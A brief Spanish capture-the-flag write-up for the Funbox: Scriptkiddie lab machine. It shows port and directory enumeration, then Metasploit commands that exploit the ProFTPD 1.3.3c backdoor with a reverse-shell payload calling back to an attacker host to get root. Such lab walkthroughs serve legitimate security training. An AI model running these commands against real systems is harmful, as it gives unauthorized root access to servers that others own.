Enumeramos puertos: FTP ProFTPD 1.3.3c, SSH, SMTP, HTTP (WordPress 5.7.2), POP3/IMAP, Samba:
❯ nmap -sC -sV -p21,22,25,80,110,139,143,445 -oN 02-targeted 192.168.1.53
...
21/tcp open ftp ProFTPD 1.3.3c
80/tcp open http Apache 2.4.18 / WordPress 5.7.2
...Al acceder al sitio, el enlace "Funbox: Scriptkiddie" redirige a http://funbox11, así que lo añadimos a /etc/hosts para que cargue la página completa. Enumeramos directorios con gobuster, pero solo aparecen las rutas típicas de WordPress (wp-login.php, wp-admin, wp-includes…), nada aprovechable:
❯ echo "192.168.1.53 funbox11" | sudo tee -a /etc/hosts
❯ gobuster dir -r --url http://192.168.1.53 --wordlist .../directory-list-2.3-big.txt -x php,html,txt
/wp-login.php /wp-admin /wp-includes /readme.html ...Volviendo al resultado de nmap, ProFTPD 1.3.3c tiene el famoso backdoor RCE (de ahí el nombre "scriptkiddie", se resuelve con Metasploit):
❯ searchsploit ProFTPD 1.3.3cLo explotamos con Metasploit, que da una shell root directa:
msf> use exploit/unix/ftp/proftpd_133c_backdoor
msf> set payload cmd/unix/reverse_perl
msf> set rhosts 192.168.1.53
msf> set lhost <atacante>
msf> exploitLa máquina tiene una sola flag (un banner ASCII de "FunBox").
Fin.